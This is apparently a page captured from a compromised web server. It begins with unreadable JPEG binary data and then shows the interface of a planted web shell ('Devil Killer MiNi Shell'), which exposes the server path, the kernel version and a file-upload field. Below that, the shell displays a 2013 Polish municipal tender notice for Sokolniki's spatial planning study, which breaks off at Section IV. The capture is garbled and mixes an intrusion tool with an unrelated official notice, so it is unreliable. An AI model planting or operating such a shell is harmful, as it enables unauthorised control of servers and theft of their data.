JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130212/22203-N-2013.html

<p class="kh_header"><b>Sokolniki: Wykonanie usługi - sporządzenie studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Sokolniki wraz z opracowaniem ekofizjograficznym</b><br>
<b>Numer ogłoszenia: 22203 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Sokolnikach , ul. Marsz. Józefa Piłsudskiego 1, 98-420 Sokolniki, woj. łódzkie, tel. 062 7845176, faks 062 7845194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sokolniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi - sporządzenie studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Sokolniki wraz z opracowaniem ekofizjograficznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zamawiający nie dopuszcza możliwości składania ofert częściowych    
2.Przedmiotem niniejszej umowy jest opracowanie studium uwarunkowań i zagospodarowania 
   przestrzennego Gminy Sokolniki wraz z opracowaniem ekofizjograficznym, w oparciu o 
   Uchwałę Nr XVIII/106/2012 Rady Gminy Sokolniki, z dnia 7 grudnia 2012 r,w sprawie
   przystąpienie do sporządzenia zmiany studium uwarunkowań i kierunków zagospodarowania
   przestrzennego Gminy Sokolniki.  
3. Opracowanie winno uwzględniać wymagania wynikające z : 
    a) ustawy z dnia 27 marca 2003 r, o planowaniu i zagospodarowaniu przestrzennym (Dz. U 
        z 2003 r, Nr 80 poz.717, z późniejszymi zmianami),
   b) rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r, w sprawie zakresu projektu
       studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz.U z 2004 r,
       Nr 118 poz.1233
   c) ustawy z dnia 3 października 2008 r, o udostępnieniu informacji o środowisku i jego
       ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na
       środowisko (Dz .U z 2008 r, Nr 199 poz.1227 z późniejszymi zmianami(,
   d) innych obowiązujących przepisów prawa, dotyczących przedmiotu zamówienia. 
  3) Granicami obszaru objętego studium są granice administracyjne Gminy Sokolniki.
  4) Do obowiązków Wykonawcy należy na swój koszt pozyskanie we własnym zakresie map
       topograficznych w odpowiedniej skali oraz innych niezbędnych do opracowania
       ekofizjograficznego z państwowego zasobu geodezyjnego. 
  5) Szczegółowy zakres zamówienia, o którym mowa wyżej obejmuje : 
      a) przygotowanie wymaganych przepisami wzorów wszystkich zawiadomień, ogłoszeń,
          obwieszczeń, wykazów, zestawień, wystąpień, uchwał niezbędnych do wykonania czynności
          określonych w art.11  ustawy o planowaniu i zagospodarowaniu przestrzennym,
      b) inwentaryzację urbanistyczną - prace terenowe (wizje terenową zainwestowania i uzbrojenia
           terenu oraz elementów przyrodniczych),
       c) sporządzenie opracowania ekofizjograficznego - dokument obejmuje tekst oraz rysunki 
           w postaci kolorowego wydruku w skali 1 : 10 000,
       d) rozpatrzenie wniosków w sprawie zmiany planu zagospodarowania złożonych wcześniej
            oraz analiza wniosków o których mowa w art.11 pkt.1 ustawy o planowaniu 
            i zagospodarowaniu przestrzennym wraz z przedstawieniem Zamawiającemu w formie
            pisemnej stanowiska o sposobie ich rozpatrzenia,
       e) opracowanie projektu studium obejmującego tekst oraz rysunki w postaci kolorowego
            wydruku i prezentacja  przez Wykonawcę w siedzibie Zamawiającego,
        f) przeanalizowanie ustaleń nieobowiązującego studium uwarunkowań i kierunków 
            zagospodarowania przestrzennego Gminy Sokolniki, wykonanego w skali 1 : 25 000
            w całym zakresie i dokonaniu oceny zmian,jakie zaszły w zagospodarowaniu przestrzennym
             i stanie własności i ich uwzględnienie w dokonywanym opracowaniu zmiany studium,
        g) wykonanie analizy i oceny zgłoszonych wniosków, które wpłynęły do siedziby
             Zamawiającego po zawiadomieniu o przystąpieniu do zmiany studium (sporządzenie
             rejestru graficznego),
        h) wykonanie analizy wydanych decyzji o warunkach zabudowy
             i zagospodarowania terenu i decyzji ustalenia celu publicznego i ich uwzględnienie 
             w opracowywanej zmianie studium uwarunkowań i kierunków zagospodarowania
             przestrzennego,
          i) wykonanie analizy uwarunkowań w zakresie ochrony środowiska przyrodniczego (m.in.
              zieleń, obszary chronione, gleby mineralne i organiczne, strefy uciążliwości, meliorację,
              ujęcia wody, obszary zagrożenia środowiskowego, itp.) i ich uwzględnienie w
              opracowywanej zmianie studium i kierunków zagospodarowania przestrzennego,
         j)  wykonanie analizy uwarunkowań w zakresie układu komunikacyjnego (m.in. ocena stanu 
              istniejącego, analiza głównych problemów komunikacyjnych, wnioski do zmian
              istniejącego układu komunikacyjnego oraz kierunków rozwoju układu i ich uwzględnienie 
              w studium uwarunkowań i kierunków zagospodarowania przestrzennego,
        k)  wykonanie analizy rozwoju funkcjonalno - przestrzennego i jej uwzględnienie 
              w opracowywanym studium,
         l)  uzyskanie akceptacji Zamawiającego dla przyjętych rozwiązań przed przystąpieniem 
             do dalszych prac planistycznych - prezentacja projektu studium na posiedzeniu komisji
             urbanistyczno -  architektonicznej - uzyskanie pozytywnej opinii,
         ł) sporządzenie projektu studium w formie tekstowej oraz w formie graficznej, rysunek
            studium w skali 1 : 10 000 - ilość egzemplarzy w formie tekstowej i cyfrowej niezbędna 
            do dokonania uzgodnień i opinii wymaganych przepisami prawa,
        m) opracowanie prognozy oddziaływania na środowisko (studium) spełniającej wymagania
              aktualnie obowiązujących przepisów w tym zakresie,
         n) uzyskanie wymaganych przepisami prawa uzgodnień i opinii wraz z przygotowaniem
              projektów pism do instytucji i organów oponujących i uzgadniających projekt studium
              wraz z prognozę oddziaływania na środowisko,
          o) analiza otrzymanych opinii i uzgodnień wraz z przygotowaniem wykazu opinii oraz
               wprowadzeniem zmian wynikłych z uzyskanych opinii i uzgodnień, ewentualne
               wdrożenie ponownej procedury opiniowania i uzgodnienia, po uzyskaniu pozytywnej
               opinii komisji urbanistyczno - planistycznej Rady Gminy Sokolniki,
          p) sporządzenie projektu studium do publicznego wglądu - przygotowanie projektów pism
              związanych z wyłożeniem,
          r) uczestniczenie i udzielenie niezbędnych wyjaśnień w dyskusji publicznej nad przyjętymi 
              w projekcie studium  rozwiązaniami oraz sporządzenie protokołu z tej dyskusji,jak również
              uczestniczenia w innych spotkaniach organizowanych przez Zamawiającego związanych 
              z przedmiotem zamówienia, w tym w posiedzeniach Komisji Rady Gminy i sesjach :
               - wszystkie czynności będące przedmiotem zamówienia Wykonawca zobowiązany będzie
                 wykonać we własnym zakresie i na własny koszt, co uwzględni przy sporządzeniu oferty
                 na to zadanie, m in. opracowanie, redagowanie projektów pism zawiadamiających,
                 uzgadniających, obwieszczających, opiniujących, redagowanie projektów ogłoszeń,
               - przygotowanie projektów zawiadomień , obwieszczeń - również do prasy o wyłożeniu
                 do publicznego wglądu itp. 
           s)  analiza złożonych uwag do wyłożonego projektu studium, sporządzenie wykazu uwag
                wniesionych do projektu studium wraz z pisemnym stanowiskiem dotyczącym ich
                uwzględnienia lub nieuwzględniania,
           t) wprowadzenie zmian do projektu studium wynikających z uwzględniania wniesionych
              uwag,a następnie w niezbędnym zakresie ponowienie uzgodnień,
         w) przedłożenie Radzie Gminy Sokolniki projektu studium po zmianach wynikających 
               z uwzględnionych uwag - projekt uchwały wraz z załącznikami,
           z) przygotowanie do przedstawienia Wojewodzie uchwały o uchwaleniu studium wraz 
               z załącznikami oraz dokumentacją prac planistycznych,
           ż) udział w czynnościach niezbędnych do ewentualnego doprowadzenia studium do
               zgodności z przepisami prawa, w sytuacji stwierdzenia nieważności uchwały przez
               Wojewodę.
       6) Wszelkie prace projektowe lub czynności nie opisane powyżej, a wynikające z procedur
            określonych w ustawie oraz przepisach szczególnych, niezbędne do właściwego 
            i kompletnego opracowania zamówienia Wykonawca winien wykonać w ramach
            przedmiotu zamówienia i uwzględnić w kosztach i terminach wykonania przedmiotu
            zamówienia .
       7) Zamówienie obejmuje wykonanie i dostarczenie Zamawiającemu do jego siedziby
            przedmiotu zamówienia w następujących formach : 
           a) studium uwarunkowań i kierunków zagospodarowania przestrzennego : 
               - 5 egz. rysunku studium w technice barwnej w skali 1 : 10 000, w tym 1 egz rysunku
                 studium w technice barwnej podklejony folią,
               - 5 egz. części tekstowej,
               - część tekstowa i graficzna studium w wersji elektronicznej (5 płyty CD/DVD) - część
                  tekstowa studium  (nośnik elektroniczny do odczytu i wydruku, część graficzna studium
                  w formacie plików : JPG,DWG,PDF,DXF),
            b) opracowanie ekofizjograficzne : 
                - pięć egzemplarzy ekofizjografii w formie papierowej i jeden elektronicznej (2 płyty
                  CD/DVD),
            c) prognoza oddziaływania na środowisko :
                - pięć egzemplarzy prognozy oddziaływania na środowisko w formie papierowej 
                  i elektronicznej (2 płyty CD)DVD),
                - rysunki, mapy w wersji kolorowej
            d) dokumentacja planistyczna : 
                - komplet dokumentacji prac planistycznych wykonanej w jednym egzemplarzu - 
                  oryginał.
      8) Treść projektu uchwał wraz z załącznikami należy wykonać zgodnie z wymaganiami 
          określonymi Rozporządzeniu z dnia 25 kwietnia 2008 r, w sprawie wymagań technicznych
          dokumentów elektronicznych zawierających akty normatywne i inne akty prawne,
          elektronicznej formy dzienników urzędowych oraz środków komunikacji elektronicznej 
          i informatycznych nośników danych (Dz. U z 2008 r, Nr 75 poz.451, z późniejszymi
          zmianami).
      9) Za dzień wykonania zamówienia uznaje się dzień dostarczenia Zamawiającemu kompletu
          dokumentów, o których mowa w umowie, po stwierdzeniu przez Wojewodę zgodności
           uchwalanego studium z prawem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza w okresie 3 lat od podpisania umowy, udzielenie następnych
 zamówień uzupełniających, o których mowa w art.67 ust.1 pkt.6 ustawy Prawo zamówień
 publicznych, podlegających na wykonaniu usług, które mogą okazać się 
 konieczne z powodu ewentualnych korekt projektu do wysokości 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości : 2.100,00 zł , słownie : dwa tysiące sto złotych 00)100
2.Wadium może być wnoszone w jednej lub kilku następujących formach : 
    1) pieniądzu,
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej
        z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
    3) gwarancjach bankowych,
    4) gwarancjach ubezpieczeniowych,
    5) poręczeniach udzielonych przed podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy 
        z dnia 9 listopada 2000 r, o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
        (Dz. U. z 2007 r, Nr 42 poz.275, ze zmianami : Dz. U z 2008 r, Nr 116 poz.730 i 732 i Nr 227
         poz.1505, oraz z 2010 r, Nr 96 poz.620).
3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek  bankowy Rejonowego
    Banku Spółdzielczego w Lututowie, oddział w Sokolnikach,
    nr konta : 79 9256 0004 4200 0127 2000 0010 z adnotacją : Wadium przetargowe - 
    na wykonanie usługi - sporządzenie projektu studium uwarunkowań i kierunków
    zagospodarowania przestrzennego Gminy Sokolniki wraz z opracowaniem
   ekofizjograficznym
4.Wadium wniesione w pieniądzu Zamawiający przechowuje się na rachunku bankowym.
5.Wadium należy złożyć przed upływem terminem składania
    ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania
     na rachunku bankowym Zamawiającego. 
6.Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy
   rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia 
   rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy 
   wskazany przez Wykonawcę.
7.Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą
    w osobnej kopercie. 
8.Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać 
   stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty 
   wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego  
   bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta)poręczyciela. 
9.Oferta niezabezpieczona wadium w jednej lub kilku z podanych wyżej form zostanie wykluczona 
   bez rozpatrywania.
10.Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego
     oferta zostanie wybrana jako najkorzystniejsza.
11.Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci 
     wadium niezwłocznie po zawarciu umowy.
12.Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed 
     upływem terminu składania ofert.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została 
     wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
     określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się
      niemożliwe z przyczyn leżących po stronie Wykonawcy.
14.W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte 
      w art.45 i art.46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże spełnienie warunku, jeżeli w okresie ostatnich 3 lat przed upływem   
         terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie,
         wykonał co najmniej 2 studia lub zmiany studiów uwarunkowań i kierunków
         zagospodarowania przestrzennego o powierzchni nie mniejszej niż 8 000 ha, lub równoważne
        zmiany miejscowych planów zagospodarowania przestrzennego - za opracowane plany należy
        rozumieć plany uchwalone i ogłoszone w Dzienniku Urzędowym, których ogłoszenie 
        nastąpiło w okresie 3 lat poprzedzających złożenie oferty, z podaniem ich
        wartości,przedmiotu,
        dat wykonania i odbiorców oraz załączeniem dokumentu/ów potwierdzających, że usługi te
        zostały wykonane lub są wykonane należycie - według załącznika nr 9 do SIWZ- Wykonawca
        potwierdzi spełnieniu warunku, jeśli wykaz będzie zawierał co najmniej 2 wykonane usługi.
        Zamawiający oceni spełnienie warunku udziału w postępowaniu metodą spełnia) nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdzi spełnienie warunku, jeżeli dysponuje co najmniej 1 osoba posiadającą 
         aktualny wpis na listę członków odpowiedniej izby urbanistów, o której mowa w art.5 ust.3
         ustawy z dnia 15 grudnia 2000 r., o samorządach zawodowych architektów, inżynierów
         budownictwa  oraz urbanistów (Dz. U z 2001 r, Nr 5 poz.42 z późn.zm.), który będzie pełnić
         funkcję głównego projektanta zmiany studium. Należy złożyć oświadczenia, że osoby które
         będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy 
         nakładają obowiązek posiadania takich uprawnień.
         Zamawiający oceni spełnienie warunku udziału w postępowaniu metodą spełnia ) nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i załączniki : 
1) Formularz ofertowy - wypełniony i podpisany przez Wykonawcę,
2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art.22 ust.1 Prawa zamówień
     publicznych.
3) Wykaz osób do kontaktów z Zamawiającym.
4) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia   
         z art.24 ust.1 Prawa zamówień publicznych.
5) Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia
6) Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia,posiadają 
     wymagane uprawnienia.
7) Wykaz podwykonawców, którzy będą uczestniczyć w wykonaniu zamówienia.
8) Wzór umowy - zaparafowany przez Wykonawcę 
9) Wykaz wykonanych usług.
10) Dokumenty potwierdzające posiadanie uprawnień)pełnomocnictw osób składających ofertę, 
      o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
